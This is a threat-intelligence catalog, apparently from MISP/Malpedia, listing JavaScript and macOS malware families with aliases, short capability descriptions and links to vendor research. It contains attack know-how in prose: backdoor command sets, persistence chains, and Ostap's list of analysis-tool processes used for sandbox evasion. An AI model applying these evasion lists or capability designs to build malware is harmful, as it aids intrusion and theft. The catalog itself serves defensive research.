https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html
https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/
https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218
https://sansec.io/research/magecart-corona-lockdown
https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/
https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/
https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/
https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/
https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://twitter.com/MBThreatIntel/status/1416101496022724609
https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/
https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html
https://www.reflectiz.com/the-gocgle-web-skimming-campaign/

MiniJS

MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.

The tag is: misp-galaxy:malpedia="MiniJS"

MiniJS is also known as:

Table 1168. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.minijs
https://www.virustotal.com/gui/file/0ce9aadf6a3ffd85d6189590ece148b2f9d69e0ce1c2b8eb61361eb8d0f98571/details

More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are: - d&exec = download and execute PE file - gtfo = delete files/startup entries and terminate - more_eggs = download additional/new scripts - more_onion = run new script and terminate current script - more_power = run command shell commands

The tag is: misp-galaxy:malpedia="More_eggs"

More_eggs is also known as:

SKID
SpicyOmelette

Table 1169. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs
https://twitter.com/Arkbird_SOLG/status/1301536930069278727
https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/
https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/
https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf
https://asert.arbornetworks.com/double-the-infection-double-the-fun/
https://www.secureworks.com/research/threat-profiles/gold-kingswood
https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw
https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
http://www.secureworks.com/research/threat-profiles/gold-kingswood
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers
https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/
https://blog.morphisec.com/cobalt-gang-2.0
https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire
https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/
https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
https://attack.mitre.org/software/S0284/
https://github.com/eset/malware-ioc/tree/master/evilnum
https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

The tag is: misp-galaxy:malpedia="NanHaiShu"

NanHaiShu is also known as:

Table 1170. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu
https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering
https://attack.mitre.org/software/S0228/
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

NodeRAT

The tag is: misp-galaxy:malpedia="NodeRAT"

NodeRAT is also known as:

Table 1171. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf
https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/
https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html

ostap

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

AgentSimulator.exe anti-virus.EXE BehaviorDumper BennyDB.exe ctfmon.exe fakepos_bin FrzState2k gemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe) ImmunityDebugger.exe KMS Server Service.exe ProcessHacker procexp Proxifier.exe python tcpdump VBoxService VBoxTray.exe VmRemoteGuest vmtoolsd VMware2B.exe VzService.exe winace Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

The tag is: misp-galaxy:malpedia="ostap"

ostap is also known as:

Table 1172. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/
https://www.intrinsec.com/deobfuscating-hunting-ostap/
https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py

Powmet

The tag is: misp-galaxy:malpedia="Powmet"

Powmet is also known as:

Table 1173. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/

QNodeService

According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.

The tag is: misp-galaxy:malpedia="QNodeService"

QNodeService is also known as:

Table 1174. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice
https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/
https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf

QUICKCAFE

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

The tag is: misp-galaxy:malpedia="QUICKCAFE"

QUICKCAFE is also known as:

Table 1175. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

scanbox

The tag is: misp-galaxy:malpedia="scanbox"

scanbox is also known as:

Table 1176. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/
https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global
https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
http://resources.infosecinstitute.com/scanbox-framework/
https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

The tag is: misp-galaxy:malpedia="SQLRat"

SQLRat is also known as:

Table 1177. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat
https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

Starfighter (Javascript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: misp-galaxy:malpedia="Starfighter (Javascript)"

Starfighter (Javascript) is also known as:

Table 1178. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter
https://github.com/Cn33liz/StarFighters

Swid

The tag is: misp-galaxy:malpedia="Swid"

Swid is also known as:

Table 1179. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.swid
https://imp0rtp3.wordpress.com/2021/08/12/tetris/

HTML5 Encoding

The tag is: misp-galaxy:malpedia="HTML5 Encoding"

HTML5 Encoding is also known as:

Table 1180. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext
https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/
https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

Maintools.js

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

The tag is: misp-galaxy:malpedia="Maintools.js"

Maintools.js is also known as:

Table 1181. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools
https://twitter.com/JohnLaTwC/status/915590893155098629

Unidentified JS 001 (APT32 Profiler)

The tag is: misp-galaxy:malpedia="Unidentified JS 001 (APT32 Profiler)"

Unidentified JS 001 (APT32 Profiler) is also known as:

Table 1182. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001
https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f
https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

The tag is: misp-galaxy:malpedia="Unidentified JS 003 (Emotet Downloader)"

Unidentified JS 003 (Emotet Downloader) is also known as:

Table 1183. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003
https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

The tag is: misp-galaxy:malpedia="Unidentified JS 004"

Unidentified JS 004 is also known as:

Table 1184. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004
https://marcoramilli.com/2020/11/27/threat-actor-unkown/

Unidentified JS 005 (Stealer)

The tag is: misp-galaxy:malpedia="Unidentified JS 005 (Stealer)"

Unidentified JS 005 (Stealer) is also known as:

Table 1185. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_005
https://blogs.jpcert.or.jp/en/2021/07/water_pamola.html

Unidentified JS 002

The tag is: misp-galaxy:malpedia="Unidentified JS 002"

Unidentified JS 002 is also known as:

Table 1186. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002

Valak

The tag is: misp-galaxy:malpedia="Valak"

Valak is also known as:

Valek

Table 1187. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.valak
https://threatresearch.ext.hp.com/detecting-ta551-domains/
https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7
https://twitter.com/malware_traffic/status/1207824548021886977
https://security-soup.net/analysis-of-valak-maldoc/
https://www.cybereason.com/blog/valak-more-than-meets-the-eye
https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/
https://unit42.paloaltonetworks.com/valak-evolution/
https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/
https://blog.talosintelligence.com/2020/07/valak-emerges.html

witchcoven

The tag is: misp-galaxy:malpedia="witchcoven"

witchcoven is also known as:

Table 1188. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven
https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

AppleJeus (OS X)

The tag is: misp-galaxy:malpedia="AppleJeus (OS X)"

AppleJeus (OS X) is also known as:

Table 1189. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a
https://objective-see.com/blog/blog_0x54.html
https://securelist.com/apt-trends-report-q2-2020/97937/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://securelist.com/operation-applejeus-sequel/95596/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d
https://securelist.com/operation-applejeus/87553/
https://objective-see.com/blog/blog_0x5F.html
https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56
https://us-cert.cisa.gov/ncas/alerts/aa21-048a
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://objective-see.com/blog/blog_0x49.html
https://www.youtube.com/watch?v=1NkzTKkEM2k

Bella

The tag is: misp-galaxy:malpedia="Bella"

Bella is also known as:

Table 1190. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella
https://threatintel.blog/OPBlueRaven-Part2/
https://github.com/kai5263499/Bella
https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/

Bundlore

The tag is: misp-galaxy:malpedia="Bundlore"

Bundlore is also known as:

SurfBuyer

Table 1191. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c
https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/
https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore—leaves-it-unused.html
https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20

Careto

The tag is: misp-galaxy:malpedia="Careto"

Careto is also known as:

Appetite
Mask

Table 1192. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto
https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed

Casso

The tag is: misp-galaxy:malpedia="Casso"

Casso is also known as:

Table 1193. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources: - on Github (where the trojanized compiled binary didn’t match the displayed source code), o - on popular and trusted download sites line CNET’s Download.com or MacUpdate.com, and - as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim’s computer: - collect information about the infected computer - execute arbitrary shell scripts on the target computer - upload an arbitrary file from the victim’s hard drive to a remote server - update itself to a newer version

The tag is: misp-galaxy:malpedia="CoinThief"

CoinThief is also known as:

Table 1194. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief
https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed
https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/

Coldroot RAT

The tag is: misp-galaxy:malpedia="Coldroot RAT"

Coldroot RAT is also known as:

Table 1195. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat
https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf
https://objective-see.com/blog/blog_0x2A.html

Convuster

The tag is: misp-galaxy:malpedia="Convuster"

Convuster is also known as:

Table 1196. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.convuster
https://securelist.com/convuster-macos-adware-in-rust/101258/

CpuMeaner

The tag is: misp-galaxy:malpedia="CpuMeaner"

CpuMeaner is also known as:

Table 1197. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner
https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/

CreativeUpdater

The tag is: misp-galaxy:malpedia="CreativeUpdater"

CreativeUpdater is also known as:

Table 1198. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater
https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/
https://objective-see.com/blog/blog_0x29.html
https://digitasecurity.com/blog/2018/02/05/creativeupdater/

Crisis

The tag is: misp-galaxy:malpedia="Crisis"

Crisis is also known as:

Table 1199. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis
https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?
http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html
https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines

Crossrider

The tag is: misp-galaxy:malpedia="Crossrider"

Crossrider is also known as:

Table 1200. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider
https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social

Dacls (OS X)

The tag is: misp-galaxy:malpedia="Dacls (OS X)"

Dacls (OS X) is also known as:

Table 1201. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls
https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/
https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/
https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
https://www.sygnia.co/mata-framework
https://securelist.com/apt-trends-report-q2-2020/97937/
https://objective-see.com/blog/blog_0x5F.html
https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/
https://objective-see.com/blog/blog_0x57.html
https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/

DarthMiner

The tag is: misp-galaxy:malpedia="DarthMiner"

DarthMiner is also known as:

Table 1202. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer
https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/

Dockster

The tag is: misp-galaxy:malpedia="Dockster"

Dockster is also known as:

Table 1203. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster
http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html
https://www.f-secure.com/weblog/archives/00002466.html

Dummy

The tag is: misp-galaxy:malpedia="Dummy"

Dummy is also known as:

Table 1204. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy
https://objective-see.com/blog/blog_0x32.html

Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:

Managing files
Listing processes
Connecting to various database management systems such as MySQL or SQLite
Connecting via bind/reverse shell
Executing shell command
Capturing and browsing images and videos from the victim’s webcam
Sending emails with an attachment

The tag is: misp-galaxy:malpedia="Eleanor"

Eleanor is also known as:

Table 1205. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor
https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/

ElectroRAT

The tag is: misp-galaxy:malpedia="ElectroRAT"

ElectroRAT is also known as:

Table 1206. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat
https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://objective-see.com/blog/blog_0x61.html

EvilOSX

The tag is: misp-galaxy:malpedia="EvilOSX"

EvilOSX is also known as:

Table 1207. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx
https://github.com/Marten4n6/EvilOSX
https://twitter.com/JohnLaTwC/status/966139336436498432

EvilQuest

The tag is: misp-galaxy:malpedia="EvilQuest"

EvilQuest is also known as:

ThiefQuest

Table 1208. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest
https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://github.com/gdbinit/evilquest_deobfuscator
https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/
https://objective-see.com/blog/blog_0x59.html
https://objective-see.com/blog/blog_0x5F.html
https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/
https://twitter.com/dineshdina04/status/1277668001538433025

FailyTale

The tag is: misp-galaxy:malpedia="FailyTale"

FailyTale is also known as:

Table 1209. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale
https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

FinFisher (OS X)

The tag is: misp-galaxy:malpedia="FinFisher (OS X)"

FinFisher (OS X) is also known as:

Table 1210. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher
https://objective-see.com/blog/blog_0x4F.html
https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/
https://securelist.com/finspy-unseen-findings/104322/
https://objective-see.com/blog/blog_0x5F.html
https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/
https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/

FlashBack

The tag is: misp-galaxy:malpedia="FlashBack"

FlashBack is also known as:

FakeFlash

Table 1211. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback
http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html
https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed
https://en.wikipedia.org/wiki/Flashback_(Trojan)
http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html

FruitFly

The tag is: misp-galaxy:malpedia="FruitFly"

FruitFly is also known as:

Quimitchin

Table 1212. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly
https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html
https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/
https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf
https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/

Gmera

The tag is: misp-galaxy:malpedia="Gmera"

Gmera is also known as:

Kassi
StockSteal

Table 1213. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera
https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/
https://objective-see.com/blog/blog_0x53.html
https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/

HiddenLotus

The tag is: misp-galaxy:malpedia="HiddenLotus"

HiddenLotus is also known as:

Table 1214. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus
https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/

iMuler

The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:

capture screenshots
exfiltrate files to a remote computer
send various information about the infected computer
extract ZIP archive
download files from a remote computer and/or the Internet
run executable files

The tag is: misp-galaxy:malpedia="iMuler"

iMuler is also known as:

Revir

Table 1215. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler
https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/
http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html
https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/

Janicab

The tag is: misp-galaxy:malpedia="Janicab"

Janicab is also known as:

Table 1216. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab
https://archive.f-secure.com/weblog/archives/00002576.html
https://securelist.com/deathstalker-mercenary-triumvirate/98177/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.macmark.de/blog/osx_blog_2013-08-a.php
https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/
https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html

KeRanger

The tag is: misp-galaxy:malpedia="KeRanger"

KeRanger is also known as:

Table 1217. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger
https://objective-see.com/blog/blog_0x16.html
https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html
http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/

Keydnap

The tag is: misp-galaxy:malpedia="Keydnap"

Keydnap is also known as:

Table 1218. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap
https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/
https://github.com/eset/malware-ioc/tree/master/keydnap
http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://objective-see.com/blog/blog_0x16.html

Kitmos

The tag is: misp-galaxy:malpedia="Kitmos"

Kitmos is also known as:

KitM

Table 1219. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos
https://www.f-secure.com/weblog/archives/00002558.html

Komplex

The tag is: misp-galaxy:malpedia="Komplex"

Komplex is also known as:

JHUHUGIT
JKEYSKW
SedUploader

Table 1220. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex
